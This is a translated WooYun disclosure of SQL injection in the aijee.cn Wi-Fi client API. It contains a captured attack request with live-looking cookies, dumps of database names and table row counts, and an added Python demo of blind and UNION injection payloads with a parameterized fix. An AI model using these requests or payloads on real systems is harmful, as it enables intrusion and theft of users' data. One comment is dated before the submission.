Vulnerability overview (24 followers)

Defect ID: wooyun-2016-0196990

Title: WIFI security: injection in the wifi密探 client exposes tens of millions of users / 130+ cities / DBA privileges

Affected vendor: aijee.cn

Author: 头晕脑壳疼

Submitted: 2016-04-20 13:15

Fixed: 2016-06-06 11:10

Published: 2016-06-06 11:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Favorited by 4


Vulnerability details

Disclosure status:

2016-04-20: details sent to the vendor, awaiting vendor handling
2016-04-22: vendor confirmed; details disclosed to the vendor only
2016-05-02: details disclosed to core white hats and domain experts
2016-05-12: details disclosed to regular white hats
2016-05-22: details disclosed to intern white hats
2016-06-06: details disclosed to the public

Brief description:

Digging bugs isn't easy for a newbie; any chance of a small gift as a reward?

Details:

POST /CApp1_3_5/checkNet HTTP/1.1
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Host: p.aijee.cn
Connection: close
User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
Cookie: PHPSESSID=uvg31p37bbo23i6ms65fldlln6; SERVERID=6f41b44ea2ad9c8fbb722f6e285fd6ba|1460777940|1460777940
Cookie2: $Version=1
Accept-Encoding: gzip

uuid=48600807e2a4486898dd658d48073629&mac=08%3A00%3A27%3A25%3A83%3A6a


The uuid parameter is injectable.

[screenshot: 1.png]
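The mechanism behind "uuid is injectable", as an added example that is not part of the original report and not aijee.cn's code. The page never shows the server-side handler, so the handler, the table names (device, wm_user) and the rows below are constructed stand-ins; only the parameter names uuid and mac and the shape of their captured values come from the request above. The block shows the boolean probe a scanner uses to decide the parameter is injectable, a UNION payload pulling rows from a table the endpoint was never meant to read, the same query with bound parameters, and a format check on uuid/mac as a second layer.

```python
import re
import sqlite3


# Constructed sample data (not from the report): the table the endpoint
# legitimately consults, plus a second table standing in for the kind of
# user data the enumeration in the report reached.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE device (uuid TEXT, mac TEXT, net_ok INTEGER);
        INSERT INTO device VALUES
          ('48600807e2a4486898dd658d48073629', '08:00:27:25:83:6a', 1);
        CREATE TABLE wm_user (id INTEGER, phone TEXT, pwd_hash TEXT);
        INSERT INTO wm_user VALUES
          (1, '13800000001', 'hash-one'),
          (2, '13800000002', 'hash-two');
        """
    )
    return conn


def check_net_vulnerable(conn, uuid: str, mac: str) -> list:
    """Hypothetical handler with the bug: POST fields spliced into SQL text."""
    sql = ("SELECT uuid, mac, net_ok FROM device "
           f"WHERE uuid = '{uuid}' AND mac = '{mac}'")
    return conn.execute(sql).fetchall()


def check_net_parameterized(conn, uuid: str, mac: str) -> list:
    """Same query with bound parameters: input can never become SQL."""
    sql = "SELECT uuid, mac, net_ok FROM device WHERE uuid = ? AND mac = ?"
    return conn.execute(sql, (uuid, mac)).fetchall()


# Shape of the values seen in the captured request: 32 hex chars and a
# colon-separated MAC. Rejecting anything else is defence in depth, not
# a substitute for parameterization.
UUID_RE = re.compile(r"^[0-9a-f]{32}$")
MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def check_net_fixed(conn, uuid: str, mac: str) -> list:
    uuid, mac = uuid.lower(), mac.lower()
    if not (UUID_RE.match(uuid) and MAC_RE.match(mac)):
        raise ValueError("malformed uuid or mac")
    return check_net_parameterized(conn, uuid, mac)


GOOD_UUID = "48600807e2a4486898dd658d48073629"
GOOD_MAC = "08:00:27:25:83:6a"

# Boolean-based probe: same row comes back only when the injected condition
# is true, which is how a scanner concludes the parameter is injectable.
BLIND_TRUE = GOOD_UUID + "' AND '1'='1"
BLIND_FALSE = GOOD_UUID + "' AND '1'='2"

# UNION payload of the kind derived once the column count (3 here) is known;
# the trailing comment discards the rest of the WHERE clause.
UNION_PAYLOAD = "x' UNION SELECT phone, pwd_hash, id FROM wm_user -- "


def demo() -> dict:
    conn = build_db()
    blind_true = check_net_vulnerable(conn, BLIND_TRUE, GOOD_MAC)
    blind_false = check_net_vulnerable(conn, BLIND_FALSE, GOOD_MAC)
    leaked = sorted(check_net_vulnerable(conn, UNION_PAYLOAD, "whatever"))
    safe = check_net_parameterized(conn, UNION_PAYLOAD, "whatever")
    try:
        check_net_fixed(conn, UNION_PAYLOAD, GOOD_MAC)
        rejected = False
    except ValueError:
        rejected = True
    legit = check_net_fixed(conn, GOOD_UUID.upper(), GOOD_MAC.upper())
    return {
        "blind_true": blind_true,
        "blind_false": blind_false,
        "leaked": leaked,
        "safe": safe,
        "rejected": rejected,
        "legit": legit,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The parameterized query alone already defeats both payloads; the regex layer is there so that a malformed uuid is rejected before any query runs and shows up in logs as a 4xx rather than an empty result. Neither layer addresses the other finding in this report: a web application account with DBA rights turns any single injection into the whole server, so the application user should be granted only what the endpoints need.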


available databases [136]:
[*] asbeta
[*] authserver
[*] information_schema
[*] mysql
[*] rdsh
[*] rdsh2
[*] rdsh2bak
[*] rdsh_akesudiqu
[*] rdsh_aletaidiqu
[*] rdsh_anshan
[*] rdsh_baicheng
[*] rdsh_baishan
[*] rdsh_baiyin
[*] rdsh_baoding
[*] rdsh_baotou
[*] rdsh_bayannaoer
[*] rdsh_beijing
[*] rdsh_benxi
[*] rdsh_binzhou
[*] rdsh_cangzhou
[*] rdsh_changchun
[*] rdsh_changzhi
[*] rdsh_chaoyang
[*] rdsh_chengde
[*] rdsh_chifeng
[*] rdsh_chongzuo
[*] rdsh_dalian
[*] rdsh_dandong
[*] rdsh_daqing
[*] rdsh_datong
[*] rdsh_dezhou
[*] rdsh_dingxi
[*] rdsh_dongying
[*] rdsh_fangchenggang
[*] rdsh_fushun
[*] rdsh_fuxin
[*] rdsh_guigang
[*] rdsh_guilin
[*] rdsh_guyuan
[*] rdsh_haerbin
[*] rdsh_hamidiqu
[*] rdsh_handan
[*] rdsh_hegang
[*] rdsh_heihe
[*] rdsh_hengshui
[*] rdsh_hetiandiqu
[*] rdsh_heze
[*] rdsh_hezhou
[*] rdsh_huhehaote
[*] rdsh_huludao
[*] rdsh_hulunbeier
[*] rdsh_jiamusi
[*] rdsh_jiayuguan
[*] rdsh_jilin
[*] rdsh_jinan
[*] rdsh_jinchang
[*] rdsh_jincheng
[*] rdsh_jining
[*] rdsh_jinzhong
[*] rdsh_jinzhou
[*] rdsh_jiuquan
[*] rdsh_jixi
[*] rdsh_kashidiqu
[*] rdsh_kelamayi
[*] rdsh_laibin
[*] rdsh_laiwu
[*] rdsh_langfang
[*] rdsh_lanzhou
[*] rdsh_liaocheng
[*] rdsh_liaoyang
[*] rdsh_liaoyuan
[*] rdsh_linfen
[*] rdsh_linyi
[*] rdsh_log
[*] rdsh_longnan
[*] rdsh_lvliang
[*] rdsh_mudanjiang
[*] rdsh_panjin
[*] rdsh_pay
[*] rdsh_pingliang
[*] rdsh_putian
[*] rdsh_qingdao
[*] rdsh_qingyang
[*] rdsh_qinhuangdao
[*] rdsh_qinzhou
[*] rdsh_qiqihaer
[*] rdsh_qitaihe
[*] rdsh_rizhao
[*] rdsh_sanming
[*] rdsh_shenyang
[*] rdsh_shijiazhuang
[*] rdsh_shizuishan
[*] rdsh_shuangyashan
[*] rdsh_shuozhou
[*] rdsh_siping
[*] rdsh_songyuan
[*] rdsh_suihua
[*] rdsh_tachengdiqu
[*] rdsh_taian
[*] rdsh_taiyuan
[*] rdsh_tangshan
[*] rdsh_tianjin
[*] rdsh_tianshui
[*] rdsh_tieling
[*] rdsh_tonghua
[*] rdsh_tongliao
[*] rdsh_tulufandiqu
[*] rdsh_weifang
[*] rdsh_weihai
[*] rdsh_wuhai
[*] rdsh_wulanchabu
[*] rdsh_wulumuqi
[*] rdsh_wuwei
[*] rdsh_wuzhong
[*] rdsh_wuzhou
[*] rdsh_xinganmeng
[*] rdsh_xingtai
[*] rdsh_xining
[*] rdsh_xinzhou
[*] rdsh_yangquan
[*] rdsh_yantai
[*] rdsh_yichun
[*] rdsh_yinchuan
[*] rdsh_yingkou
[*] rdsh_yulin
[*] rdsh_yuncheng
[*] rdsh_zaozhuang
[*] rdsh_zhangjiakou
[*] rdsh_zhangye
[*] rdsh_zhongwei
[*] rdsh_zhou
[*] rdsh_zibo
[*] rdshbak
[*] rdshtest
[*] root
[*] test


DBA privileges

[screenshot: 2.png]


There are two user tables.
Tens of millions of users:

+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| rdsh_wm_user | 42644005 |
| rdsh_push_log_postion | 6425031 |
| rdsh_coupon_mt_role | 4777601 |
| rdsh_app_count | 3783171 |
| rdsh_coupon_mt | 2081793 |
| rdsh_wm_router | 1980000 |
| rdsh_wm_business_day | 1848251 |
| rdsh_wm_business | 1811110 |
| rdsh_router_warning | 1274784 |
| rdsh_coupon_nm_shop | 1157876 |
| rdsh_portallog | 1023002 |
| rdsh_user | 860361 |
| rdsh_coupon_mt_shop | 836490 |
| rdsh_coupon_nm_shop_bak | 640520 |
| rdsh_push_current_postion | 614973 |
| rdsh_smsinterfacelog | 559888 |
| rdsh_wifi_speed_log | 519264 |
| rdsh_imagelib | 428069 |
| rdsh_business_dp | 384370 |
| rdsh_business_status | 384370 |
| rdsh_deal_business | 378170 |
| rdsh_deal_image_more | 373569 |
| rdsh_coupon_nm_role_bak | 341461 |
| rdsh_deal | 292367 |
| rdsh_coupon_nm_role | 262659 |
| rdsh_business1 | 248561 |
| rdsh_image | 247861 |
| applog | 239581 |
| rdsh_coupon_nm | 239514 |
| rdsh_deal_restriction | 239200 |
| rdsh_wificonf | 221395 |
| rdsh_business_fans | 206737 |
| rdsh_coupon_nm_role_his | 190375 |
| rdsh_wifi_android_log | 183767 |
| rdsh_special_subject_log | 168739 |
| rdsh_sign | 142881 |
| rdsh_fans_count | 135971 |
| rdsh_wx_unionid | 127687 |
| tomato_report_log | 126725 |
| rdsh_business_wifi | 123853 |
| rdsh_coupon_nm_bak | 119984 |
| rdsh_setting | 107414 |
| rdsh_business_account | 106680 |
| rdsh_slide_business | 105832 |
| rdsh_merchant | 102423 |
| rdsh_business | 101440 |
| rdsh_push_log | 90398 |
| rdsh_ad_capp_home_log | 88939 |
| rdsh_agent_business | 80773 |
| rdsh_wifiscanlog | 78198 |
| rdsh_ce | 75011 |
| rdsh_coupon_count | 66450 |
| rdsh_send_push_log | 65507 |
| rdsh_business_wifi_audit_user | 60664 |
| rdsh_business_qrlog | 60012 |
| rdsh_business_coupon_fans | 50462 |
| rdsh_tongji | 44382 |
| rdsh_day_static | 37999 |
| rdsh_business_fans_dd_count | 35808 |
| rdsh_mall_business | 30854 |
| rdsh_coupon_mt_role_his | 30314 |
| rdsh_accounttable | 22626 |
| rdsh_business_dp_goods | 22574 |
| rdsh_business_static | 22521 |
| rdsh_accountrel | 21422 |
| rdsh_accountlog | 17583 |
| rdsh_goods_img | 15506 |
| rdsh_goodsprice | 15377 |
| rdsh_goods | 15259 |
| rdsh_classes_goods_business | 15030 |
| rdsh_business_wifi_shield | 11981 |
| rdsh_business_dp_img | 11287 |
| rdsh_business_instore_promotion | 11157 |
| rdsh_coupon_mt_his | 10000 |
| rdsh_coupon_nm_his | 10000 |
| rdsh_business_wifi_pwd_error | 7497 |
| rdsh_onlinebill | 7399 |
| rdsh_business_cloudstore_realname | 7236 |
| rdsh_goods_show | 6495 |
| rdsh_neighborhood | 6064 |
| rdsh_channel | 5808 |
| rdsh_business_coupon | 5154 |
| rdsh_user_wxqrcode | 4559 |
| rdsh_business_wifi_copy4 | 4554 |
| rdsh_classes | 4338 |
| rdsh_user2 | 4319 |
| rdsh_column_business | 4182 |
| rdsh_user_sharepoint | 4180 |
| rdsh_goods_browse_log | 4000 |
| rdsh_dp_count | 3516 |
| rdsh_district1 | 3446 |
| rdsh_business_shorturl | 3187 |
| rdsh_trace_log | 3141 |
| rdsh_district | 3092 |
| rdsh_userfeedback | 2931 |
| rdsh_business_wifi_audit | 2910 |
| rdsh_business_guest | 2876 |
| rdsh_promotion_partake | 2699 |
| rdsh_business_service | 2674 |
| rdsh_promotion_collect | 2652 |
| rdsh_sms | 2434 |
| rdsh_contract | 2287 |
| rdsh_image_txt_business | 1889 |
| rdsh_trade_static | 1848 |
| rdsh_special_subject_products | 1827 |
| rdsh_app_version | 1803 |
| rdsh_tm_goods | 1627 |
| rdsh_router | 1574 |
| rdsh_business_giftresult | 1545 |
| rdsh_visit_business | 1218 |
| rdsh_review | 1164 |
| rdsh_ordertreatlog | 1085 |
| rdsh_business_vip | 1050 |
| rdsh_call_business | 973 |
| rdsh_business_nearpush | 896 |
| rdsh_download_app | 896 |
| rdshb_contract | 841 |
| rdsh_business_offer | 805 |
| rdsh_agent_users | 779 |
| rdsh_platuser_role | 762 |
| rdsh_bankcard_bin | 725 |
| rdsh_ibeacon | 681 |
| rdsh_orderitems | 647 |
| rdsh_goodsdaystatic | 642 |
| rdsh_wxshake | 604 |
| rdsh_category_b | 598 |
| rdsh_dt_count | 505 |
| rdsh_plat_user | 490 |
| rdsh_portal_count | 479 |
| rdsh_device_count | 477 |
| rdsh_review_business | 440 |
| rdsh_business_cloudstore | 426 |
| rdsh_aijee_area | 424 |
| rdsh_business_black_white_mac | 423 |
| rdsh_business_fans_privilege | 405 |
| rdsh_citys_yd | 387 |
| rdsh_system_message | 386 |
| rdsh_system_message_status | 386 |
| rdsh_service_business | 380 |
| rdsh_platform_order | 372 |
| rdsh_city | 360 |
| rdsh_ordertable | 359 |
| tomato_report | 337 |
| rdsh_server_finance_status | 334 |
| rdsh_orderpost | 307 |
| rdsh_wxshake_url | 282 |
| rdsh_business_opener_sub | 279 |
| rdsh_category_mx | 278 |
| rdsh_business_opener | 267 |
| rdsh_special_subject | 256 |
| rdsh_business_fav | 255 |
| rdsh_stat_day_activity_register | 255 |
| rdsh_stat_day_au | 255 |
| rdsh_stat_day_retention_rate | 255 |
| rdsh_stat_day_start_up_time_used | 255 |
| rdsh_transaction_pay_log | 253 |
| rdsh_work_order | 250 |
| rdsh_business_msg | 221 |
| rdsh_special_subject_comment | 200 |
| rdsh_router_cancellog | 197 |
| rdsh_reviews_business | 185 |
| rdsh_user_habit | 185 |
| rdsh_cash_apply | 145 |
| rdsh_promotion_comment | 138 |
| rdsh_cash_job | 119 |
| rdsh_offlinepos | 114 |
| rdsh_business_wifi_bak | 111 |
| rdsh_joinus_apply | 110 |
| rdsh_paper_withdraw | 107 |
| rdsh_promotion | 107 |
| rdsh_agent | 106 |
| rdsh_feedback | 101 |
| rdsh_receive_gift | 95 |
| rdsh_shopping_cart | 92 |
| rdsh_business_bank | 90 |
| `temporary` | 88 |
| rdsh_member_address | 87 |
| rdsh_goodsold | 86 |
| rdsh_business_bank_list | 82 |
| rdsh_wifi_business_auto | 81 |
| rdsh_voucher | 66 |
| rdsh_special_subject_praise | 52 |
| rdsh_buy_agent_goods | 48 |
| rdsh_category_c | 42 |
| rdsh_crontab | 38 |
| rdsh_log_ceshi | 38 |
| rdsh_router_conf | 37 |
| rdsh_stat_week_au | 37 |
| rdsh_stat_week_retention_rate | 37 |
| rdsh_app_ad | 35 |
| rdsh_coupon_business | 35 |
| rdsh_province | 35 |
| rdsh_discount_info | 32 |
| rdsh_slide | 29 |
| rdsh_column | 26 |
| rdsh_jd_goods | 26 |
| rdsh_wechat_menu | 26 |
| rdsh_user_card | 24 |
| rdsh_voucher_user | 22 |
| rdsh_business_review | 21 |
| rdsh_aijee_msg | 20 |
| rdsh_platrole | 16 |
| rdsh_wifiscan | 14 |
| rdsh_pad | 13 |
| rdsh_category_a | 12 |
| rdsh_paper | 11 |
| rdsh_report | 10 |
| rdsh_business_contacts | 9 |
| rdsh_ordercomplaint_img | 9 |
| rdsh_stat_month_au | 9 |
| rdsh_wechat_word | 9 |
| rdsh_business_ddsms | 8 |
| rdsh_stat_month_retention_rate | 8 |
| rdsh_vocational_img | 8 |
| rdsh_wechat_sub | 7 |
| rdsh_business_weixin_account | 6 |
| rdsh_image_txt | 6 |
| rdsh_wechat_def | 6 |
| rdsh_gift | 5 |
| rdsh_paper_probability | 5 |
| rdsh_sms_interface | 5 |
| rdsh_wechat_img | 5 |
| rdsh_message_moban | 4 |
| rdsh_ordercomplaint | 4 |
| rdsh_smsjoblog | 4 |
| rdsh_voucher_moban | 4 |
| rdsh_acctool | 3 |
| rdsh_agent_user | 3 |
| rdsh_business_area_voucher | 3 |
| rdsh_business_role | 3 |
| rdsh_cam | 3 |
| rdsh_userfeedbackreply | 3 |
| rdsh_business_msg_rules | 2 |
| rdsh_userfeedbackreply_moban | 2 |
| rdsh_agent_role | 1 |
| rdsh_app_ad_customer | 1 |
| rdsh_business_coupon_push | 1 |
| rdsh_business_scene | 1 |
| rdsh_paper_set | 1 |
| rdsh_pos | 1 |
| rdsh_sys_conf | 1 |
+-----------------------------------+---------+


Proof of vulnerability:


Proposed fix:

Copyright notice: please credit the source when reposting: 头晕脑壳疼@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2016-04-22 11:07

Vendor reply:

Currently being handled; many thanks @头晕脑壳疼

Latest status:

None yet


Comments:

  1. 2016-04-16 14:07 | prolog ( regular white hat | Rank:841 vulnerabilities:177 )

    66666

  2. 2016-04-20 15:59 | px1624 ( regular white hat | Rank:1137 vulnerabilities:200 | px1624)

    Awesome~